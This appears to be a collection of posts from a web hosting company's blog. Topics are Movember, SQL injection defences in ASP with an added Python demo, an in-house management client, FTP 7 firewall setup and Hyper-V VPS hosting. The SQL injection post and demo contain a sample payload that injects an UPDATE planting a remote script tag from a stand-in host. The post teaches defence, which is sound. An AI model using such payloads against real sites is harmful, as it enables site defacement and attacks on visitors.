You know those normally hygienic people who for some strange reason decide to throw it out the window once a year and grow a hideous moustache?
Well believe it or not they haven't gone mad, they are supporting Movember which aims to raise funds and awareness for men's health.
This month my staff are on the ball, setting up a campaign where 5% of every Web Hosting or HyperVPS account purchased in the month of November will go straight to the Movember Foundation.
That money will then go on to either the Prostate Cancer Foundation of Australia or beyondblue: the national depression initiative. Two worthy causes I think you'll agree.
"SQL Injection" has become an increasingly common way for hackers to attack web sites, but what is SQL Injection and what can web developers do to avoid it?
SQL injection involves manipulating the variables sent to a web page in order to place additional SQL queries within queries used as part of the web site code.
Take the following simple example using ASP:
szQuery = "Select * From myTable Where ID = " & Request("ID")
Because the Request("ID") value isn't filtered or checked in any way, an attacker can manipulate the URL query string to append any SQL statements they like to the query, and the database will run them.
So if they host a script at, say, http://testdomain.local/bad.js, and myTable has a column called "Description" that is displayed on the page, an attacker could request the following:
"testpage.asp?ID=1;Update myTable set Description = '<script src="http://testdomain.local/bad.js"></script>' Where ID = 1"
THIS IS BAD
So how does one fix it?
The best approach is to not use request variables directly in SQL in the first place, but in ASP this is not always an easy option.
In ASP.NET, however, the problem is solved by using SqlCommand.Parameters to add each variable the query needs, so the value is sent to the database separately from the SQL text.
Then the SQL Query will look something like this:
Select * From myTable Where ID = @ID;
But if you need to quickly fix older code in ASP, then filtering each request variable manually is a reasonable approach (though not completely foolproof).
szID = Replace(Replace(Request("ID"), "'", "''"), ";", "")   ' double any single quotes, drop any semicolons
szQuery = "Select * From myTable Where ID = '" & szID & "'"
The above "escapes" the potentially dangerous characters ' and ; before the value is quoted: a single quote is doubled so it stays inside the string literal, and a semicolon is removed so a second statement cannot be appended.
Note that the above is only helpful if the ID variable is a string.
If the variable is a known type other than a string (say Integer) then casting must be used to prevent nasty SQL from being inserted:
iID = CINT(Request("ID"))
szQuery = "Select * From myTable Where ID = " & iID
In the above example, if an attacker passes anything other than a number in ID, CInt raises a type mismatch error and the query is never built, let alone run.
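As an added example that is not part of the original post, here are the vulnerable query and the three defences above run against an in-memory SQLite database in Python (the post's code is ASP and ASP.NET, so this is a translation of the idea, not the post's code). Table and column names follow the post; the two sample rows, the request values and the function names are constructed for this demo. One SQLite-specific detail: the vulnerable version uses executescript(), because sqlite3's execute() refuses batched statements and would hide the problem that the post's ADO/SQL Server stack exposes.

```python
"""Added example (not part of the original post): the vulnerable query and
the three defences discussed above, run against an in-memory SQLite
database. Table and column names follow the post; the two rows, the
request values and the function names are constructed for this demo."""
import sqlite3

# The post's payload, exactly as it would arrive in Request("ID").
PAYLOAD = ("1;Update myTable set Description = "
           "'<script src=\"http://testdomain.local/bad.js\"></script>' Where ID = 1")


def fresh_db():
    """Constructed sample data: two rows, nothing else."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE myTable (ID INTEGER PRIMARY KEY, Description TEXT)")
    conn.executemany("INSERT INTO myTable VALUES (?, ?)", [(1, "Widget"), (2, "Gadget")])
    conn.commit()
    return conn


def description(conn, row_id=1):
    """Read back the Description column, the value the page would display."""
    return conn.execute("SELECT Description FROM myTable WHERE ID = ?", (row_id,)).fetchone()[0]


def vulnerable_lookup(conn, request_id):
    """Equivalent of: szQuery = "Select * From myTable Where ID = " & Request("ID")

    executescript() runs every statement in the string, which is what the
    ADO/SQL Server stack in the post does; sqlite3's execute() would reject
    the second statement and hide the problem."""
    query = "SELECT * FROM myTable WHERE ID = " + request_id
    conn.executescript(query)


def escaped_lookup(conn, request_id):
    """The quick fix for old ASP: double single quotes, drop semicolons, then
    wrap the value in quotes. Still string building, so only as safe as the filter."""
    sz_id = request_id.replace("'", "''").replace(";", "")
    query = "SELECT * FROM myTable WHERE ID = '" + sz_id + "'"
    return conn.execute(query).fetchall()


def cast_lookup(conn, request_id):
    """The CInt approach: anything that is not an integer raises ValueError
    before a single byte of SQL is built."""
    i_id = int(request_id)
    return conn.execute("SELECT * FROM myTable WHERE ID = " + str(i_id)).fetchall()


def parameterized_lookup(conn, request_id):
    """The SqlCommand.Parameters approach: the SQL text is fixed and the
    value travels separately, so it can never be parsed as SQL."""
    return conn.execute("SELECT * FROM myTable WHERE ID = ?", (request_id,)).fetchall()


def demo():
    """Run each variant against a fresh database and report the outcome."""
    out = {}
    conn = fresh_db()
    vulnerable_lookup(conn, PAYLOAD)
    out["vulnerable_description"] = description(conn)       # now carries the script tag

    conn = fresh_db()
    out["escaped_rows"] = escaped_lookup(conn, PAYLOAD)      # [] : payload is just a string
    out["escaped_description"] = description(conn)           # 'Widget' : nothing was updated

    try:
        cast_lookup(conn, PAYLOAD)
        out["cast_error"] = None
    except ValueError as exc:
        out["cast_error"] = type(exc).__name__               # 'ValueError'

    out["param_rows"] = parameterized_lookup(conn, PAYLOAD)  # []
    out["param_ok_rows"] = parameterized_lookup(conn, "1")   # [(1, 'Widget')]
    return out


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Running it shows the three outcomes side by side: the concatenated query lets the UPDATE through and the Description column now holds the script tag; the escaped and parameterised lookups treat the whole payload as an ordinary string that matches no row; the cast version never reaches the database at all. Note that the escaping variant only holds up for values that are quoted as strings, which is the point the post makes about using CInt for integer columns.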
So there you have it, SQL Injection is easy to avoid once you know how.
If you've wondered why there haven't been any posts to our blog in the last few weeks then wonder no more!
I have been busy at work on the latest version of our customer management system, codenamed "blackbriar" (see our blog entry about "Alcatraz" for what the system is all about).
The two key features of this release are:
We'll be releasing an IIS7 based Web Hosting service to the public soon, but in the mean time power users may be more interested in our new Hyper-V VPS service which comes with Windows Server 2008 and IIS7 as standard.
Alcatraz Island: a prison surrounded by water.
On the surface I’ll admit it doesn’t sound like such a great name to call a customer management system.
We were thinking more along the lines of the security aspects the name implies rather than the concept of our staff feeling imprisoned while using it!
Alcatraz or simply “Management Client” is the system our staff use to manage customer accounts on a daily basis.
Take a look at the screenshot below:
What will be immediately obvious to anyone who has worked in the web hosting industry before is that Alcatraz is an actual program and not a web site.
Most if not all off-the-shelf hosting management systems (such as Plesk etc) are web based and this can significantly increase the time it takes for a staff member to attend to a query.
Alcatraz on the other hand is super fast!
Alcatraz was built from scratch to suit our unique way of doing things here at Studiocoast.
Some of the reasons why Alcatraz is great:
If you’re a programmer you may be interested in how it all works behind the scenes:
So what does the future hold for Alcatraz?
At the moment I am hard at work on version 3.0 codenamed Blackbriar.
It will feature native support for IIS7 and MySQL 5.0 plus much much more.
I hope this post has been educational. If you have any questions about “Alcatraz” feel free to post in the comments below.
Perhaps you are a customer and would like to see some new features in hostControl. I’m all ears!
Just a quick note on FTP 7, the new FTP server software for Windows Server 2008.
A guide I found on iis.net describes setting up passive port ranges and opening them up in the firewall one by one.
I have found an alternative method which I think is a lot easier to setup:
1. Open up Windows Firewall with Advanced Security from Administrative Tools
2. Right click Inbound Rules and select New Rule
3. Select the Custom Rule option and click next.
4. Select All Programs and then click Customize next to Services
5. Select Apply to this service and select from the list Microsoft FTP Service
6. For all the next steps simply click Next accepting the defaults.
7. For the name call it something like "Microsoft FTP Firewall Access"
8. Click Finish
Note: this rule allows access to any ports the FTP Service opens. This is usually port 21, and any passive ports it opens for client connections.
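The same rule can be created from a command prompt, which is handy for scripting a fresh server. This is an added example, not from the original post or the iis.net guide it mentions; it uses netsh advfirewall, which ships with Windows Server 2008, and assumes the FTP 7 service's short name is ftpsvc (the first line checks that before anything is changed).

```powershell
# Added example, not from the original post. Creates the same inbound rule
# the eight GUI steps above produce, scoped to the FTP service rather than
# to a list of ports, so it covers port 21 and whatever passive data port
# the service opens for a client.

# Assumption: the FTP 7 service's short name is ftpsvc. Confirm it first
# (sc.exe, not the PowerShell "sc" alias for Set-Content).
sc.exe query ftpsvc

# Inbound allow rule bound to the service; protocol and ports are left at
# their defaults (any), exactly as the GUI wizard does when you click Next.
netsh advfirewall firewall add rule name="Microsoft FTP Firewall Access" dir=in action=allow service=ftpsvc

# Verify the rule exists and is enabled.
netsh advfirewall firewall show rule name="Microsoft FTP Firewall Access"
```

Because the rule follows the service and not a port range, no firewall change is needed if you later adjust the passive port range in the FTP site settings; the trade-off, as the note above says, is that every port the service chooses to listen on is reachable from the network.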
June 26 will forever be remembered in history as the day Microsoft released Hyper-V to the server masses.
Ok, well maybe it isn't THAT memorable but it is still a pretty important piece of software in the Windows Hosting arena.
Why? Well I'm glad you asked…
Hyper-V is a hypervisor-based virtualisation platform that allows multiple concurrent operating systems to share a single host computer.
Now while Virtual Private Server technology has been around for many years now in many forms, Hyper-V, like any hypervisor based technology, brings additional benefits to the table:
Both Intel and AMD provide technology to allow Hypervisor-aware operating systems more direct access to the CPU.
Previously, VPS software has had to emulate the processor in order to convince the operating system it has a CPU all to itself.
In an effort to get around the performance limitations in older technology, products such as Parallels Virtuozzo sub-divide a single operating system instance to give the appearance of multiple separate servers.
This method of virtualisation has many limitations as it does not provide true isolation. A misbehaving program on one partition could potentially access the memory of another and cause corruption or worse.
Hyper-V on the other hand will have none of those shenanigans. Each operating system instance is completely isolated and it is almost impossible for one to interfere with another.
Hyper-V comes with many administrative tools that make managing virtual servers a whole lot easier for system admins such as myself.
We will be integrating many of these features into our hostControl control panel for end users to access.
Friendly product licensing from Microsoft??? It's true, Hyper-V licensing for virtual servers is simple.
One copy of the Windows Server 2008 Datacenter Edition license allows an unlimited number of virtual servers on a single machine.
So what does this all mean for the end user then?
Purchasing a Hyper-V based virtual server from providers such as Studiocoast has the following benefits:
Install whatever you want, whenever you want with full Administrative access.
Reboot the server yourself until you're blue in the face if you want, it is all yours!
Each virtual server can have memory or disk space upgraded at the click of a button.
This allows you to purchase a server based on what you need now, all with a clear and easy upgrade path for the future.
A virtual server is much cheaper than a dedicated server and a whole lot more flexible to boot.
In the unlikely event of hardware failure, each virtual server can be quickly copied to a functioning server.
Virtual servers all use the same drivers regardless of the underlying server so hardware compatibility is never a problem.
So what are you waiting for? Check out our HyperVPS plans page.
It's been a long road to get here but the Studiocoast blog is finally online!
The Studiocoast team will be here to give you some insight into the workings of this humble Web Hosting provider.
We will also be offering some expert advice and tips shaped by the many challenges we have faced (and overcome) over the years.
Members of the team will each introduce themselves over the coming weeks as they find something to contribute!
I trust you will enjoy what we have to contribute to the blogosphere and hope you will find our posts useful.